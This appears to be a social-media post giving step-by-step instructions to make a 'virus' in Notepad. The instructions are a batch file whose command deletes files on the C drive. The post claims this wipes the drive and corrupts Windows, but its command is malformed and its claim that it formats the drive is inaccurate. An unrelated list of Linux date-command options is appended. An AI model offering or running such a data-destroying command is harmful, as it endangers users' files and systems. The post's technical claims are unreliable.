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How To Create Computer Virus in Less Than 60 Seconds

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:white_check_mark: Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad. Just follow the below steps for creating a virus within a minute. Additionally, you can remove malware from your browser if it is infected. So, lets check out how to make a virus with notepad.
How to make a virus with notepad
:large_blue_circle: Creating a Dangerous Virus
:one: First of all, in your Windows OS, open the notepad.
:two: Now copy and paste the below code in your notepad screen.
@Echo off
Del C: *.* |y

:three: Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
:large_blue_circle: Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.
:exclamation: Note : This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.

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Linux command for the day:
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Linux Date
Usage:
Date command is used to display and to set the date in Linux.

Options:
-d Display the date described by STRING not by ‘now’.
-I Display date in ISO 8601 format.
--rfc-2822 Output date and time in RFC 2822 format.
-s
Set time described by string STRING.


%a
The abbreviated weekday name (e.g., Sun).
%A
The full weekday name (e.g., Sunday).
%b
The abbreviated month name (e.g., Jan).
%B
Locale's full month name (e.g., January).
%c
The date and time (e.g., Thu Mar 3 23:05:25 2005).
%C
The current century; like %Y, except omit last two digits (e.g., 20).

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